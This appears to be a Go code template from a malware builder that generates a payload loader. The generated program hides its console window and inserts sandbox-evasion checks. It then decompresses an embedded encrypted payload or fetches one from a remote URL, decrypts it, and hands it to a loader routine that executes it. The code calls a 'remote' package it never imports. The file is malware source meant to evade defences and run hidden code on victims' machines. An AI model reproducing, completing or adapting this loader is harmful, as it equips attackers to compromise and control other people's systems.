package main

import (
    {{if .Compressor}}
        "{{.Compressor.Import}}"
    {{end}}
	"variant/crypto"
	"variant/loader"
	{{if .SandBox}}
	    "{{.SandBox.Import}}"
	{{end}}
)

func init() {
	loader.HideConsoleWin()
	{{range .SandBox.Methods}}
	    {{.}}
	{{end}}
}

func main() {
    {{if .KeyName}}
	{{.KeyName}} := []byte("{{.KeyValue}}")
	{{end}}

	{{if .Compressor}}
	    {{.KeyName}}, _ = {{.Compressor.Algorithm}}({{.KeyName}}, {{.Compressor.Ratio}})
    {{end}}

	{{if .IvName}}
	    {{.IvName}}  := []byte("{{.IvValue}}")
	    {{if .Compressor}}
	    {{.IvName}}, _ = {{.Compressor.Algorithm}}({{.IvName}}, {{.Compressor.Ratio}})
	    {{end}}
	{{end}}

	{{if .Compressor}}
    	    {{.CipherText}}, _ = {{.Compressor.Algorithm}}("{{.Payload}}", {{.Compressor.Ratio}})
    {{else}}
            {{.Remote.UrlName}} := "{{.Remote.Url}}"
            {{.CipherText}}, _ := remote.HttpString({{.Remote.UrlName}})
    {{end}}

	{{.PlainText}}, _ := crypto.{{.Decrypt}}({{.CipherText}}, {{.KeyName}}{{if .IvName}}, {{.IvName}}{{end}})

	loader.{{.Loader}}({{.PlainText}})
}



